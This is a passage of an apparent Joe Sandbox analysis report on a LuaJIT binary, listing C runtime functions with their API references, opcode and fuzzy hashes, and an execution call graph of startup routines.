                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      • Opcode ID: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                      • Instruction ID: 6af9b5085211dc5b9f3ad4a4456e4116ca94231b38750f7b55c31b87ab5e5d68
                                                      • Opcode Fuzzy Hash: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                      • Instruction Fuzzy Hash: C6118F36608B81C2EB509F19E400269B7E0FB99B99F984234EF8D07B58DF7CD451CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB5A30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: !$sqrt
                                                      • API String ID: 1757819995-799759792
                                                      • Opcode ID: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                      • Instruction ID: 2b65b02c5b4456c3b4121979e28030353428256e8a53dac02645e03416bbd9a8
                                                      • Opcode Fuzzy Hash: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                      • Instruction Fuzzy Hash: 63119876D18B8586DB01DF19958032BA661BFA77E4F508335FB6C1A6CCEF6CE0419A00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EBF010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: "$exp
                                                      • API String ID: 1757819995-2878093337
                                                      • Opcode ID: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                      • Instruction ID: 82ff8ae288dd408688e2ecae0190c30eac96ecbf3d69fbf88677001509dc9105
                                                      • Opcode Fuzzy Hash: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                      • Instruction Fuzzy Hash: 5E01CC36928B8887E320DF24D0451ABB760FFEA349F605315F7441A674CBBDD0819B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E288E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage_free_nolock
                                                      • String ID: system error %d
                                                      • API String ID: 3491801694-1688351658
                                                      • Opcode ID: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                      • Instruction ID: 93de4037fcfcccce1b09bb99b9ce698dccd1811262139ba6121a4d4f3e1287b6
                                                      • Opcode Fuzzy Hash: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                      • Instruction Fuzzy Hash: 92010432A18682C6E720AB55F45576AB3A0FB96789FD04035EB8D47A5DDF7CD4048B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB9A64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: DefaultUsertry_get_function
                                                      • String ID: GetUserDefaultLocaleName
                                                      • API String ID: 3217810228-151340334
                                                      • Opcode ID: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                      • Instruction ID: 77c60ea3741c9620f8b3f998927ff0376d08bfda87d9094d9f65b03a468fe7ae
                                                      • Opcode Fuzzy Hash: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                      • Instruction Fuzzy Hash: 45F0E951B0854281EB04B79DB6C05B9D291AF5EBCAFC84139FB0D0765DCEACD4448360
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB9AC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9AF9
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF7B1EBD7C2,?,?,00000000,00007FF7B1EBD6BA,?,?,?,00007FF7B1EAB0BD), ref: 00007FF7B1EB9B13
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                      • String ID: InitializeCriticalSectionEx
                                                      • API String ID: 539475747-3084827643
                                                      • Opcode ID: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                      • Instruction ID: b9201119b51c603e1f8a3a4ff427688d5e68d18e40f8dfa7207ca2a8c53c829f
                                                      • Opcode Fuzzy Hash: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                      • Instruction Fuzzy Hash: 66F05E21B18B51C2EB14AB99F4804AAA260FF5ABC9FC85135FB1E03B5DCFBCD4558760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1EB9828 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7B1EB9851
                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF7B1EBAB66,?,?,?,00007FF7B1EAAF01,?,?,?,?,00007FF7B1EC02A3), ref: 00007FF7B1EB9868
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: Valuetry_get_function
                                                      • String ID: FlsSetValue
                                                      • API String ID: 738293619-3750699315
                                                      • Opcode ID: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                      • Instruction ID: f65127856d303123a06710bdbe03fb4ab0d2bbbb51fc317ad392ea1372acea4f
                                                      • Opcode Fuzzy Hash: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                      • Instruction Fuzzy Hash: 4FE06561A08642D1FB04BB69F4404B9E271AF5A7CAFCC5136EB1D0639DCEBCE454C320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF7B1E0DEF0 Relevance: 5.1, APIs: 4, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B1DF348C), ref: 00007FF7B1E0DF1F
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B1DF348C), ref: 00007FF7B1E0DF83
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B1DF348C), ref: 00007FF7B1E0DFB9
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B1DF348C), ref: 00007FF7B1E0E003
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2338138443.00007FF7B1DE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7B1DE0000, based on PE: true
                                                      • Associated: 00000012.00000002.2338049579.00007FF7B1DE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339030383.00007FF7B1ED1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339165964.00007FF7B1EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339249256.00007FF7B1EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339332344.00007FF7B1EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2339573022.00007FF7B1EF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff7b1de0000_LuaJIT.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                      • Instruction ID: 62542b0c34f4c036b1288a1ce68eb5776dc3e4a81e7c7244bd6e2844874e1edf
                                                      • Opcode Fuzzy Hash: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                      • Instruction Fuzzy Hash: E0310D36618B8586DB609B1AE45126ABBA0F799B99F040166FFCD47B29CE6CC144CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:8.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.3%
                                                      Total number of Nodes:1491
                                                      Total number of Limit Nodes:31
                                                      execution_graph 13331 40a67e 13332 40a68a _raise 13331->13332 13366 40f079 HeapCreate 13332->13366 13335 40a6e7 13368 410a14 GetModuleHandleW 13335->13368 13339 40a6f8 __RTC_Initialize 13402 411a37 13339->13402 13340 40a655 _fast_error_exit 67 API calls 13340->13339 13342 40a707 13343 40a713 GetCommandLineA 13342->13343 13517 4100e1 13342->13517 13417 411900 13343->13417 13350 40a738 13453 4115cd 13350->13453 13351 4100e1 __amsg_exit 67 API calls 13351->13350 13354 40a749 13468 4101a0 13354->13468 13355 4100e1 __amsg_exit 67 API calls 13355->13354 13357 40a751 13358 40a75c 13357->13358 13359 4100e1 __amsg_exit 67 API calls 13357->13359 13474 41e1d0 FreeConsole 13358->13474 13359->13358 13361 40a779 13362 40a78b 13361->13362 13524 410351 13361->13524 13527 41037d 13362->13527 13365 40a790 _raise 13367 40a6db 13366->13367 13367->13335 13509 40a655 13367->13509 13369 410a28 13368->13369 13370 410a2f 13368->13370 13530 4100b1 13369->13530 13372 410b97 13370->13372 13373 410a39 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 13370->13373 13589 41072e 13372->13589 13375 410a82 TlsAlloc 13373->13375 13378 40a6ed 13375->13378 13379 410ad0 TlsSetValue 13375->13379 13378->13339 13378->13340 13379->13378 13380 410ae1 13379->13380 13534 41039b 13380->13534 13385 410604 __encode_pointer 6 API calls 13386 410b01 13385->13386 13387 410604 __encode_pointer 6 API calls 13386->13387 13388 410b11 13387->13388 13389 410604 __encode_pointer 6 API calls 13388->13389 13390 410b21 13389->13390 13551 40f0a9 13390->13551 13397 41067f __decode_pointer 6 API calls 13398 410b75 13397->13398 13398->13372 13399 410b7c 13398->13399 13571 41076b 13399->13571 13401 410b84 GetCurrentThreadId 13401->13378 13917 40fd1c 13402->13917 13404 411a43 GetStartupInfoA 13405 40e34a __calloc_crt 67 API calls 13404->13405 13413 411a64 13405->13413 13406 411c82 _raise 13406->13342 13407 411bff GetStdHandle 13409 411bc9 13407->13409 13408 411c64 SetHandleCount 13408->13406 13409->13406 13409->13407 13409->13408 13411 411c11 GetFileType 13409->13411 13415 4163d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 13409->13415 13410 40e34a __calloc_crt 67 API calls 13410->13413 13411->13409 13412 411b4c 13412->13406 13412->13409 13414 411b75 GetFileType 13412->13414 13416 4163d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 13412->13416 13413->13406 13413->13409 13413->13410 13413->13412 13414->13412 13415->13409 13416->13412 13418 41191e GetEnvironmentStringsW 13417->13418 13422 41193d 13417->13422 13419 411932 GetLastError 13418->13419 13420 411926 13418->13420 13419->13422 13423 411959 GetEnvironmentStringsW 13420->13423 13424 411968 WideCharToMultiByte 13420->13424 13421 4119d6 13425 4119df GetEnvironmentStrings 13421->13425 13426 40a723 13421->13426 13422->13420 13422->13421 13423->13424 13423->13426 13429 4119cb FreeEnvironmentStringsW 13424->13429 13430 41199c 13424->13430 13425->13426 13427 4119ef 13425->13427 13442 411845 13426->13442 13431 40e305 __malloc_crt 67 API calls 13427->13431 13429->13426 13432 40e305 __malloc_crt 67 API calls 13430->13432 13433 411a09 13431->13433 13434 4119a2 13432->13434 13435 411a10 FreeEnvironmentStringsA 13433->13435 13436 411a1c _realloc 13433->13436 13434->13429 13437 4119aa WideCharToMultiByte 13434->13437 13435->13426 13440 411a26 FreeEnvironmentStringsA 13436->13440 13438 4119c4 13437->13438 13439 4119bc 13437->13439 13438->13429 13441 40822f ___getlocaleinfo 67 API calls 13439->13441 13440->13426 13441->13438 13443 41185a 13442->13443 13444 41185f GetModuleFileNameA 13442->13444 13924 4147c9 13443->13924 13446 411886 13444->13446 13918 4116ab 13446->13918 13448 40a72d 13448->13350 13448->13351 13450 40e305 __malloc_crt 67 API calls 13451 4118c8 13450->13451 13451->13448 13452 4116ab _parse_cmdline 77 API calls 13451->13452 13452->13448 13454 4115d6 13453->13454 13457 4115db _strlen 13453->13457 13455 4147c9 ___initmbctable 111 API calls 13454->13455 13455->13457 13456 40e34a __calloc_crt 67 API calls 13458 411610 _strlen 13456->13458 13457->13456 13461 40a73e 13457->13461 13459 41166e 13458->13459 13458->13461 13462 40e34a __calloc_crt 67 API calls 13458->13462 13463 411694 13458->13463 13465 410d88 _strcpy_s 67 API calls 13458->13465 13466 411655 13458->13466 13460 40822f ___getlocaleinfo 67 API calls 13459->13460 13460->13461 13461->13354 13461->13355 13462->13458 13464 40822f ___getlocaleinfo 67 API calls 13463->13464 13464->13461 13465->13458 13466->13458 13467 40a46f __invoke_watson 10 API calls 13466->13467 13467->13466 13469 4101ae __IsNonwritableInCurrentImage 13468->13469 14335 40efc6 13469->14335 13471 4101cc __initterm_e 13473 4101eb __IsNonwritableInCurrentImage __initterm 13471->13473 14339 40b4c2 13471->14339 13473->13357 13475 41e3b6 13474->13475 13476 41e208 13474->13476 14443 41dbb0 13475->14443 13476->13475 13477 41e291 13476->13477 13478 41e335 13476->13478 13479 41e255 13476->13479 13480 41e219 13476->13480 13481 41e2cd 13476->13481 13483 4039b0 77 API calls 13477->13483 14439 41e170 13478->14439 13489 4039b0 77 API calls 13479->13489 14453 4039b0 13480->14453 13487 41e312 13481->13487 13488 41e2d9 13481->13488 13491 41e2b7 13483->13491 13490 4039b0 77 API calls 13487->13490 13495 4039b0 77 API calls 13488->13495 13496 41e27b 13489->13496 13501 41e249 13490->13501 13497 402560 130 API calls 13491->13497 13493 41e34c 13499 41e38e 13493->13499 13500 41e35e 13493->13500 13494 4039b0 77 API calls 13494->13501 13502 41e2ff 13495->13502 13503 402560 130 API calls 13496->13503 13497->13501 13506 4039b0 77 API calls 13499->13506 13504 4039b0 77 API calls 13500->13504 13501->13361 13505 402560 130 API calls 13502->13505 13503->13501 13507 41e37b 13504->13507 13505->13501 13506->13501 13508 402560 130 API calls 13507->13508 13508->13501 13510 40a663 13509->13510 13511 40a668 13509->13511 13512 410594 __FF_MSGBANNER 67 API calls 13510->13512 13513 4103e9 __NMSG_WRITE 67 API calls 13511->13513 13512->13511 13514 40a670 13513->13514 13515 410135 _malloc 3 API calls 13514->13515 13516 40a67a 13515->13516 13516->13335 13518 410594 __FF_MSGBANNER 67 API calls 13517->13518 13519 4100eb 13518->13519 13520 4103e9 __NMSG_WRITE 67 API calls 13519->13520 13521 4100f3 13520->13521 13522 41067f __decode_pointer 6 API calls 13521->13522 13523 40a712 13522->13523 13523->13343 13525 410225 _doexit 67 API calls 13524->13525 13526 410362 13525->13526 13526->13362 13528 410225 _doexit 67 API calls 13527->13528 13529 410388 13528->13529 13529->13365 13531 4100bc Sleep GetModuleHandleW 13530->13531 13532 4100da 13531->13532 13533 4100de 13531->13533 13532->13531 13532->13533 13533->13370 13595 410676 13534->13595 13536 4103a3 __init_pointers __initp_misc_winsig 13598 410c25 13536->13598 13539 410604 __encode_pointer 6 API calls 13540 4103df 13539->13540 13541 410604 TlsGetValue 13540->13541 13542 41063d GetModuleHandleW 13541->13542 13543 41061c 13541->13543 13545 410658 GetProcAddress 13542->13545 13546 41064d 13542->13546 13543->13542 13544 410626 TlsGetValue 13543->13544 13549 410631 13544->13549 13547 410635 13545->13547 13548 4100b1 __crt_waiting_on_module_handle 2 API calls 13546->13548 13547->13385 13550 410653 13548->13550 13549->13542 13549->13547 13550->13545 13550->13547 13552 40f0b4 13551->13552 13553 40f0e2 13552->13553 13601 4163d3 13552->13601 13553->13372 13555 41067f TlsGetValue 13553->13555 13556 410697 13555->13556 13557 4106b8 GetModuleHandleW 13555->13557 13556->13557 13560 4106a1 TlsGetValue 13556->13560 13558 4106d3 GetProcAddress 13557->13558 13559 4106c8 13557->13559 13563 4106b0 13558->13563 13561 4100b1 __crt_waiting_on_module_handle 2 API calls 13559->13561 13564 4106ac 13560->13564 13562 4106ce 13561->13562 13562->13558 13562->13563 13563->13372 13565 40e34a 13563->13565 13564->13557 13564->13563 13568 40e353 13565->13568 13567 40e390 13567->13372 13567->13397 13568->13567 13569 40e371 Sleep 13568->13569 13606 41599e 13568->13606 13570 40e386 13569->13570 13570->13567 13570->13568 13896 40fd1c 13571->13896 13573 410777 GetModuleHandleW 13574 410787 13573->13574 13575 41078d 13573->13575 13576 4100b1 __crt_waiting_on_module_handle 2 API calls 13574->13576 13577 4107a5 GetProcAddress GetProcAddress 13575->13577 13578 4107c9 13575->13578 13576->13575 13577->13578 13579 40f225 __lock 63 API calls 13578->13579 13580 4107e8 InterlockedIncrement 13579->13580 13897 410840 13580->13897 13583 40f225 __lock 63 API calls 13584 410809 13583->13584 13900 40c5ba InterlockedIncrement 13584->13900 13586 410827 13912 410849 13586->13912 13588 410834 _raise 13588->13401 13590 410738 13589->13590 13591 410744 13589->13591 13594 41067f __decode_pointer 6 API calls 13590->13594 13592 410766 13591->13592 13593 410758 TlsFree 13591->13593 13592->13592 13593->13592 13594->13591 13596 410604 __encode_pointer 6 API calls 13595->13596 13597 41067d 13596->13597 13597->13536 13599 410604 __encode_pointer 6 API calls 13598->13599 13600 4103d5 13599->13600 13600->13539 13605 40fd1c 13601->13605 13603 4163df InitializeCriticalSectionAndSpinCount 13604 416423 _raise 13603->13604 13604->13552 13605->13603 13607 4159aa _raise 13606->13607 13608 4159c2 13607->13608 13618 4159e1 _memset 13607->13618 13619 40d524 13608->13619 13612 415a53 RtlAllocateHeap 13612->13618 13613 4159d7 _raise 13613->13568 13618->13612 13618->13613 13625 40f225 13618->13625 13632 40fa37 13618->13632 13638 415a9a 13618->13638 13641 4105dc 13618->13641 13644 410852 GetLastError 13619->13644 13621 40d529 13622 40a597 13621->13622 13623 41067f __decode_pointer 6 API calls 13622->13623 13624 40a5a7 __invoke_watson 13623->13624 13626 40f23a 13625->13626 13627 40f24d EnterCriticalSection 13625->13627 13691 40f162 13626->13691 13627->13618 13629 40f240 13629->13627 13630 4100e1 __amsg_exit 66 API calls 13629->13630 13631 40f24c 13630->13631 13631->13627 13635 40fa65 13632->13635 13633 40fafe 13637 40fb07 13633->13637 13891 40f64e 13633->13891 13635->13633 13635->13637 13884 40f59e 13635->13884 13637->13618 13895 40f14b LeaveCriticalSection 13638->13895 13640 415aa1 13640->13618 13642 41067f __decode_pointer 6 API calls 13641->13642 13643 4105ec 13642->13643 13643->13618 13658 4106fa TlsGetValue 13644->13658 13647 4108bf SetLastError 13647->13621 13648 40e34a __calloc_crt 64 API calls 13649 41087d 13648->13649 13649->13647 13650 41067f __decode_pointer 6 API calls 13649->13650 13651 410897 13650->13651 13652 4108b6 13651->13652 13653 41089e 13651->13653 13663 40822f 13652->13663 13654 41076b __initptd 64 API calls 13653->13654 13656 4108a6 GetCurrentThreadId 13654->13656 13656->13647 13657 4108bc 13657->13647 13659 41072a 13658->13659 13660 41070f 13658->13660 13659->13647 13659->13648 13661 41067f __decode_pointer 6 API calls 13660->13661 13662 41071a TlsSetValue 13661->13662 13662->13659 13665 40823b _raise 13663->13665 13664 4082b4 _raise _realloc 13664->13657 13665->13664 13667 40f225 __lock 65 API calls 13665->13667 13675 40827a 13665->13675 13666 40828f RtlFreeHeap 13666->13664 13668 4082a1 13666->13668 13671 408252 ___sbh_find_block 13667->13671 13669 40d524 ___strgtold12_l 65 API calls 13668->13669 13670 4082a6 GetLastError 13669->13670 13670->13664 13672 40826c 13671->13672 13676 40f288 13671->13676 13683 408285 13672->13683 13675->13664 13675->13666 13677 40f2c7 13676->13677 13682 40f569 13676->13682 13678 40f4b3 VirtualFree 13677->13678 13677->13682 13679 40f517 13678->13679 13680 40f526 VirtualFree HeapFree 13679->13680 13679->13682 13686 4110b0 13680->13686 13682->13672 13690 40f14b LeaveCriticalSection 13683->13690 13685 40828c 13685->13675 13687 4110c8 13686->13687 13688 4110f7 13687->13688 13689 4110ef __VEC_memcpy 13687->13689 13688->13682 13689->13688 13690->13685 13692 40f16e _raise 13691->13692 13693 40f194 13692->13693 13717 410594 13692->13717 13699 40f1a4 _raise 13693->13699 13763 40e305 13693->13763 13699->13629 13701 40f1c5 13705 40f225 __lock 67 API calls 13701->13705 13702 40f1b6 13704 40d524 ___strgtold12_l 67 API calls 13702->13704 13704->13699 13706 40f1cc 13705->13706 13707 40f200 13706->13707 13708 40f1d4 13706->13708 13710 40822f ___getlocaleinfo 67 API calls 13707->13710 13709 4163d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 13708->13709 13711 40f1df 13709->13711 13712 40f1f1 13710->13712 13711->13712 13713 40822f ___getlocaleinfo 67 API calls 13711->13713 13769 40f21c 13712->13769 13715 40f1eb 13713->13715 13716 40d524 ___strgtold12_l 67 API calls 13715->13716 13716->13712 13772 416855 13717->13772 13720 416855 __set_error_mode 67 API calls 13722 4105a8 13720->13722 13721 4103e9 __NMSG_WRITE 67 API calls 13723 4105c0 13721->13723 13722->13721 13724 40f183 13722->13724 13725 4103e9 __NMSG_WRITE 67 API calls 13723->13725 13726 4103e9 13724->13726 13725->13724 13727 4103fd 13726->13727 13728 416855 __set_error_mode 64 API calls 13727->13728 13759 40f18a 13727->13759 13729 41041f 13728->13729 13730 41055d GetStdHandle 13729->13730 13732 416855 __set_error_mode 64 API calls 13729->13732 13731 41056b _strlen 13730->13731 13730->13759 13735 410584 WriteFile 13731->13735 13731->13759 13733 410430 13732->13733 13733->13730 13734 410442 13733->13734 13734->13759 13778 410d88 13734->13778 13735->13759 13738 410478 GetModuleFileNameA 13740 410496 13738->13740 13745 4104b9 _strlen 13738->13745 13741 410d88 _strcpy_s 64 API calls 13740->13741 13743 4104a6 13741->13743 13743->13745 13746 40a46f __invoke_watson 10 API calls 13743->13746 13744 4104fc 13803 4147e7 13744->13803 13745->13744 13794 41485b 13745->13794 13746->13745 13750 410520 13753 4147e7 _strcat_s 64 API calls 13750->13753 13752 40a46f __invoke_watson 10 API calls 13752->13750 13754 410534 13753->13754 13756 410545 13754->13756 13757 40a46f __invoke_watson 10 API calls 13754->13757 13755 40a46f 